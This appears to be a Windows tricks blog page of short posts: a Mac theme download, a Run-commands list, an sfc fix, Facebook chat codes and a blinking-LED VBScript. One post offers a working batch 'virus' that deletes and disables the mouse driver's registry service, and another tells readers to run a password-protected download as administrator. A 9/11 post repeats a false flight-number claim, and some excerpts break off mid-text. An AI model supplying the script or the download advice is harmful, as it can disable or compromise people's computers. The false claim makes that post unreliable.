
Transform your windows 7 to Mac os X

                    Ever wanted to experience the look of  Mac Os X , If yes then here i brought you an amazing mac theme for your windows.This will give your computer a completely new look like mac. This is great theme to experience Mac Os X. Download the file from below link and enjoy mac os x theme. Extract the file and run it as administrator. Right click on file and click on  Run as administrator. Password  for the rar file is  tricks4u                                            DOWNLOAD YOUR FILE

100+ Run commands List

Accessibility Options :  access.cpl Add Hardware :  hdwwiz.cpl Add / Remove Programs :  appwiz.cpl Administrative Tools :  control admintools Automatic Updates :  wuaucpl.cpl Wizard file transfer Bluethooth :  fsquirt Calculator :  calc Certificate Manager :  certmgr.msc Character :  charmap Checking disk :  chkdsk Manager of the album (clipboard) :  clipbrd Command Prompt :  cmd Service components (DCOM) :  dcomcnfg Computer Management :  compmgmt.msc DDE active sharing :  ddeshare Device Manager :  devmgmt.msc DirectX Control Panel (if installed) :  directx.cpl DirectX Diagnostic Utility :  dxdiag Disk Cleanup :  cleanmgr System Information :  dxdiag Disk Defragmenter :  dfrg.msc Disk Management :  diskmgmt.msc Partition manager :  diskpart Display Properties :  control desktop Properties of the display (2) :  desk.cpl Properties display (tab "appearance") :  control color Dr. Watson :  drwtsn32 Manager vérirficateur drivers :  check Eve

Fix windows xp corrupted file easily

               Today i will show you how to easily  fix  Windows xp  corrupted files . Its work perfectly on windows  x p and might works on windows 7 and windows vista also. Just follow below instruction to fix your corrupted window.       REQUIREMENTS PC Running Windows xp Windows XP CD       HOW TO DO THAT ? Place Windows XP cd in your CD/DVD drive. Then Go to  Start  >  Run  Type in  sfc /scannow Now your XP will run fine.

World trade center attack trick on notepad

   As some of you might be knowing that the  flight number  of the plane that had hit  World Trade Center  on that dreadful day (9/11) was  Q33NY . Now call this trick a coincidence or anything else but whatever it is, it does startle us. you will be definately amazed by the this trick. First open  Notepad . Type “ Q33N ” (without quotes) in capital letters. Increase the  font size  to  72 . Change the Font to  Wingdings .

virus that disable Mouse

virus which is harmfull it will  disable your mouse so think before trying it on yourself. 1. Open  Notepad  and copy below codes. rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem --------------------------------- 2.  Save this file as   virus.bat. 3.  Done you just created your virus.

Codes of A-Z for Facebook chat.

Facebook chat   Codes Below are codes of A-Z which you can use in facebook chat. You can create your on words with this codes. [[107015582669715]]  = A [[116067591741123]]  = B [[115602405121532]]  = C [[112542438763744]]  = D [[115430438474268]]  = E [[109225112442557]]  = F [[111532845537326]]  = G [[111356865552629]]  = H [[109294689102123]]  = I [[126362660720793]]  = J [[116651741681944]]  = K [[115807951764667]]  = L [[106596672714242]]  = M [[108634132504932]]  = N [[116564658357124]]  = O [[111669128857397]]  = P [[107061805996548]]  = Q [[106699962703083]]  = R [[115927268419031]]  = S [[112669162092780]]  = T [[108983579135532]]  = U [[107023745999320]]  = V [[106678406038354]]  = W [[116740548336581]]  = X [[112416755444217]]  = Y [[165724910215]]        = Z  How to use this codes ? First think what word you want to create then pick up codes of that alphabat from above codes Let us create  hi  . So pick

Keyboard Dancing Led Light Trick

How to do that ? Today i will be showing you an interesting trick which will let your keyboard led  light to dance. Basicly we will be creating a vbscript to make caps lock, num lock and scroll lock to perform this trick. So lets get started. Copy the codes given below and paste in  Notepad Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop      2.  Then  save  this file as  led.vbs  (.vbs is must)     3.  Open your save file and see your keyboard led blinking like disco lights. How to disable blinking Led ?  1. First open Task Manager [ctrl+alt+del ]  2. Then Go to process tab.  3. Select  wscript.exe   4. Click on End process.